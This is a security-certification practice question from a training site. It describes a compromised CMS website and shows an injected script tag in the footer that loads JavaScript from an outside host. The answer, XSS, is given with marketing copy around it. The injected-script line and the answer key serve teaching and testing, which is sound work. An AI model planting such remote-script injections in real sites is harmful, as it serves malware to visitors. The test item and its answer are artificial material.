Skillset can help you prepare! Sign up for your free Skillset account and take the first steps towards your certification.
As a security auditor, your customer informs you that their website has been blacklisted for hosting malware on their site. In reviewing the code, the following has been attached to the footer tag:
< script src=http://www.not-your-site.com/b.js>< /script>
The customer informs you that the site content is managed in a CMS and dynamically pulled from a database. The change logs for the site do not indicate any changes were made to the pages since before the malware was discovered. What type of attack is the customer likely a victim of?
Brute-force attack
XSS Attack
DDoS attack
Man-in-the-middle attack
XSS is commonly used to add malicious javascript to the content of CMS sites.
Train with Skillset and pass your certification exam. Faster. Guaranteed.
Study thousands of practice questions that organized by skills and ranked by difficulty.
Create a tailored training plan based on the knowledge you already possess.
Know when you’re ready for the high-stakes exam. Have the confidence that you will pass on your first attempt.